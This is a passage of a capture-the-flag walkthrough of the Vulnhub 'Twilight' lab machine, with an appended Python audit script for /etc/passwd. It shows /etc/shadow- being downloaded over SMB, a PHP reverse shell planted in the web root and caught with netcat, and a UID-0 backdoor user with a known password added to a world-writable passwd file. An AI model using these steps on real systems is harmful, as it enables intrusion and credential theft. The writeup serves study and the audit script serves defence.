  apt                                 D        0  Wed Jul  8 21:57:12 2020
  python3                             D        0  Wed Jul  8 18:10:38 2020
  mailcap.order                       N      449  Sat Feb  9 07:32:33 2019
  email-addresses                     N      312  Wed May 13 12:01:31 2020
  modules                             N      195  Wed Jul  8 18:09:47 2020
  xdg                                 D        0  Wed Jul  8 19:06:17 2020
  default                             D        0  Wed Jul  8 22:26:59 2020
  resolv.conf                         N       25  Thu Jul 16 09:52:50 2020
  initramfs-tools                     D        0  Wed Jul  8 18:10:01 2020
  ppp                                 D        0  Wed Jul  8 21:45:50 2020
  rmt                                 N    60376  Tue Apr 23 12:05:54 2019
  libibverbs.d                        D        0  Wed Jul  8 21:46:34 2020
  calendar                            D        0  Wed Jul  8 18:09:51 2020
  logrotate.d                         D        0  Wed Jul  8 22:20:44 2020
  motd                                N      286  Sat Feb  1 12:09:26 2020
  dhcp                                D        0  Wed Jul  8 18:09:50 2020
  rc3.d                               D        0  Wed Jul  8 22:26:59 2020
  host.conf                           N        9  Mon Aug  7 13:14:09 2006
  tmpfiles.d                          D        0  Wed Jan 29 13:07:53 2020
  group                               N      838  Thu Jul 16 08:43:11 2020
  update-motd.d                       D        0  Wed Jul  8 18:56:28 2020
  wpa_supplicant                      D        0  Wed Jul  8 19:06:28 2020
  dbus-1                              D        0  Wed Jul  8 19:06:03 2020
  issue                               N       27  Sat Feb  1 12:09:26 2020
  securetty                           N     4141  Fri Jul 27 04:07:37 2018
  dictionaries-common                 D        0  Wed Jul  8 19:06:30 2020
  cron.hourly                         D        0  Wed Jul  8 18:09:50 2020
  mailname                            N        9  Wed Jul  8 21:45:57 2020
  rc1.d                               D        0  Wed Jul  8 22:26:59 2020
  timezone                            N       17  Wed Jul  8 18:57:25 2020
  init.d                              D        0  Wed Jul  8 22:26:59 2020
  anacrontab                          N      401  Sun May 19 08:42:01 2019
  bindresvport.blacklist              N      367  Fri Mar  2 15:03:58 2018
  rsyslog.d                           D        0  Tue Feb 26 12:43:39 2019
  nanorc                              N     9278  Tue Jun 11 20:23:23 2019
  kernel-img.conf                     N      144  Wed Jul  8 19:15:54 2020
  discover-modprobe.conf              N      346  Sun Jan 14 16:27:01 2018
  services                            N    18774  Sat Feb  9 21:05:36 2019
  sudoers                             N      669  Wed Jul  8 21:44:33 2020
  lighttpd                            D        0  Thu Jul 16 08:22:15 2020
  subuid-                             N        0  Wed Jul  8 18:09:32 2020
  rc2.d                               D        0  Wed Jul  8 22:26:59 2020
  gai.conf                            N     2584  Wed Aug  1 01:10:47 2018
  vim                                 D        0  Wed Jul  8 18:09:50 2020
  systemd                             D        0  Wed Jul  8 18:56:31 2020
  libaudit.conf                       N      191  Thu Apr 25 10:47:32 2019
  network                             D        0  Wed Jul  8 18:09:51 2020
  rc5.d                               D        0  Wed Jul  8 22:26:59 2020
  iproute2                            D        0  Wed Jul  8 18:09:50 2020
  localtime                           N     3545  Mon Apr 27 06:46:23 2020
  apache2                             D        0  Wed Jul  8 20:03:50 2020
  ssh                                 D        0  Wed Jul  8 21:36:00 2020
  skel                                D        0  Wed Jul  8 18:09:28 2020
  group-                              N      825  Wed Jul  8 21:46:40 2020
  gshadow-                            N      696  Wed Jul  8 21:46:40 2020
  ssl                                 D        0  Wed Jul  8 20:03:32 2020
  netconfig                           N      767  Tue Dec 11 09:41:49 2018
  magic                               N      111  Tue Oct 22 15:57:17 2019
  ld.so.conf                          N       34  Fri Mar  2 15:03:58 2018
  sudoers.d                           D        0  Wed Jul  8 21:44:15 2020
  aliases                             N      198  Wed Jul  8 21:45:57 2020
  X11                                 D        0  Wed Jul  8 21:46:28 2020
  cron.d                              D        0  Wed Jul  8 20:03:32 2020
  modules-load.d                      D        0  Wed Jul  8 18:56:30 2020
  locale.alias                        N     2995  Wed May  1 13:24:19 2019
  .pwd.lock                           H        0  Wed Jul  8 18:09:31 2020
  kernel                              D        0  Wed Jul  8 18:10:01 2020
  fstab                               N      734  Wed Jul  8 18:08:47 2020
  subuid                              N       20  Wed Jul  8 19:15:56 2020
  perl                                D        0  Wed Jul  8 20:03:19 2020
  python                              D        0  Wed Jul  8 21:46:38 2020
  profile                             N      767  Fri Mar  4 06:00:00 2016
  selinux                             D        0  Wed Jul  8 18:09:27 2020
  emacs                               D        0  Wed Jul  8 19:06:05 2020
  sysctl.conf                         N     2351  Thu May 31 05:42:46 2018
  sysctl.d                            D        0  Wed Jul  8 18:56:30 2020
  shells                              N      116  Wed Jul  8 18:09:30 2020
  inputrc                             N     1748  Sat May  5 10:52:46 2018
  security                            D        0  Wed Jul  8 18:09:30 2020
  pam.conf                            N      552  Thu Feb 14 02:08:47 2019
  environment                         N        0  Wed Jul  8 18:09:30 2020
  exim4                               D        0  Wed Jul  8 22:28:45 2020
  samba                               D        0  Thu Jul 16 08:47:24 2020
  debconf.conf                        N     2969  Tue Feb 26 04:30:35 2019
  rc6.d                               D        0  Wed Jul  8 22:26:59 2020
  issue.net                           N       20  Sat Feb  1 12:09:26 2020
  grub.d                              D        0  Wed Jul  8 19:06:44 2020
  os-release                          N      261  Sat May  2 12:39:00 2020
  modprobe.d                          D        0  Sat Feb  9 18:00:31 2019
  login.defs                          N    10477  Fri Jul 27 04:07:37 2018
  rcS.d                               D        0  Wed Jul  8 18:10:58 2020
  mke2fs.conf                         N      812  Thu Jan  9 20:19:57 2020
  passwd-                             N     1579  Wed Jul  8 22:20:36 2020
  apparmor                            D        0  Wed Jul  8 18:10:40 2020
  adduser.conf                        N     2981  Wed Jul  8 18:09:32 2020
  ca-certificates.conf                N     5434  Wed Jul  8 20:03:35 2020
  adjtime                             N       44  Wed Jul  8 19:16:03 2020
  nsswitch.conf                       N      494  Sun Feb 10 11:13:53 2019
  logcheck                            D        0  Wed Jul  8 22:20:36 2020
  php                                 D        0  Wed Jul  8 20:03:30 2020
  fonts                               D        0  Wed Jul 15 21:36:05 2020
  locale.gen                          N     9376  Wed Jul  8 18:09:57 2020
  mysql                               D        0  Wed Jul  8 22:20:47 2020
  machine-id                          N       33  Wed Jul  8 18:09:36 2020
  apparmor.d                          D        0  Wed Jul  8 22:20:44 2020
  rsyslog.conf                        N     1988  Tue Feb 26 12:43:39 2019
  python3.7                           D        0  Wed Jul  8 18:10:03 2020
  discover.conf.d                     D        0  Wed Jul  8 18:58:26 2020
  binfmt.d                            D        0  Wed Jan 29 13:07:53 2020

                7158264 blocks of size 1024. 4447412 blocks available
smb: \etc\> get shadow-
getting file \etc\shadow- of size 1036 as shadow- (505.8 KiloBytes/sec) (average 1425.6 KiloBytes/sec)
smb: \etc\> quit

The shell.php script can be uploaded to the web root through the SMB share:

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ mv php-reverse-shell.php shell.php
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ vim shell.php 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ smbclient //192.168.56.174/WRKSHARE
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> cd /var/www/html
smb: \var\www\html\> put shell.php
putting file shell.php as \var\www\html\shell.php (1789.0 kb/s) (average 1789.1 kb/s)
smb: \var\www\html\> ls
  .                                   D        0  Sat Nov 12 21:18:11 2022
  ..                                  D        0  Wed Jul 15 21:44:37 2020
  current.php                         N      152  Wed Jul 15 21:58:35 2020
  shell.php                           A     5496  Sat Nov 12 21:18:11 2022
  lang.php                            N       58  Wed Jul 15 22:03:45 2020
  gallery                             D        0  Wed Jul  8 22:31:53 2020
  index.php                           N      228  Wed Jul 15 22:03:51 2020

                7158264 blocks of size 1024. 4447380 blocks available
smb: \var\www\html\> 

Requesting shell.php in the browser yields a shell on the target host:

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.174] 34876
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 21:19:16 up 40 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Privilege escalation

ls -alh /etc/passwd
-rwxrwxrwx 1 root root 1.6K Jul 16  2020 /etc/passwd

The /etc/passwd file has the widest possible permissions (777), so it can be modified to add a user jason with superuser privileges.

Run on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ openssl passwd --help
Usage: passwd [options] [password]

General options:
 -help               Display this summary

Input options:
 -in infile          Read passwords from file
 -noverify           Never verify when reading password from terminal
 -stdin              Read passwords from stdin

Output options:
 -quiet              No warnings
 -table              Format output as table
 -reverse            Switch table columns

Cryptographic options:
 -salt val           Use provided salt
 -6                  SHA512-based password algorithm
 -5                  SHA256-based password algorithm
 -apr1               MD5-based password algorithm, Apache variant
 -1                  MD5-based password algorithm
 -aixmd5             AIX MD5-based password algorithm

Random state options:
 -rand val           Load the given file(s) into the random number generator
 -writerand outfile  Write random data to the specified file

Provider options:
 -provider-path val  Provider load path (must be before 'provider' argument if required)
 -provider val       Provider to load (can be specified multiple times)
 -propquery val      Property query used when fetching algorithms

Parameters:
 password            Password text to digest (optional)
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Twilight]
└─$ openssl passwd -1 -salt jason 123456
$1$jason$kqq2SnNAGHtj7Joa0Zlp61

Add this user to the target's /etc/passwd file (the file can be edited locally on Kali Linux and then uploaded through the SMB share to overwrite passwd):

www-data@twilight:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:115::/var/spool/exim4:/usr/sbin/nologin
mysql:x:108:118::/nonexistent:/bin/false
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
www-data@twilight:/$ su - jason
su - jason
Password: 123456

root@twilight:~# cd /root
cd /root
root@twilight:~# ls
ls
root.txt
root@twilight:~# cat root.txt
cat root.txt
(\ 
\'\ 
 \'\     __________  
 / '|   ()_________)
 \ '/    \ ~~~~~~~~ \
   \       \ ~~~~~~   \
   ==).      \__________\
  (__)       ()__________)


34d3ecb1bbd092bcb87954cee55d88d3

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@twilight:~# 

Privilege escalation successful!!!
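As an added defender-side check (not part of the original post), the following Python script audits /etc/passwd for the two conditions this escalation relies on: a world-writable file mode, and a non-root UID-0 entry carrying an inline password hash instead of the shadow marker. The sample entries are constructed from the listing above; the function names are hypothetical.

```python
"""Audit /etc/passwd for the weaknesses used in the Twilight escalation.
Added example, not code from the original post."""
import os
import stat
from typing import List, Tuple

# Constructed sample: a trimmed copy of the target's passwd after the jason line
# was appended (the hash value is the one shown in the post).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
jason:$1$jason$kqq2SnNAGHtj7Joa0Zlp61:0:0:root:/root:/bin/bash
"""

SHADOW_MARKERS = ("x", "*", "!", "!!")


def find_passwd_anomalies(text: str) -> List[Tuple[str, str]]:
    """Return (username, reason) for every suspicious entry in passwd text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], f"line {lineno}: malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in SHADOW_MARKERS:
            # A real hash here is usable for login and bypasses /etc/shadow.
            findings.append((name, "password hash stored directly in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account that is not root"))
    return findings


def mode_is_world_writable(mode: int) -> bool:
    """True if the permission bits grant write access to 'other'."""
    return bool(mode & stat.S_IWOTH)


def audit(path: str = "/etc/passwd") -> List[Tuple[str, str]]:
    """Combine the file-mode check with the per-entry checks for a real file."""
    findings = []
    if mode_is_world_writable(os.stat(path).st_mode):
        findings.append((path, "world-writable; expected 0644 owned by root"))
    with open(path, encoding="utf-8") as fh:
        findings.extend(find_passwd_anomalies(fh.read()))
    return findings


if __name__ == "__main__":
    for who, why in find_passwd_anomalies(SAMPLE_PASSWD):
        print(f"{who}: {why}")
```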

posted @ 2022-11-13 10:37  Jason_huawen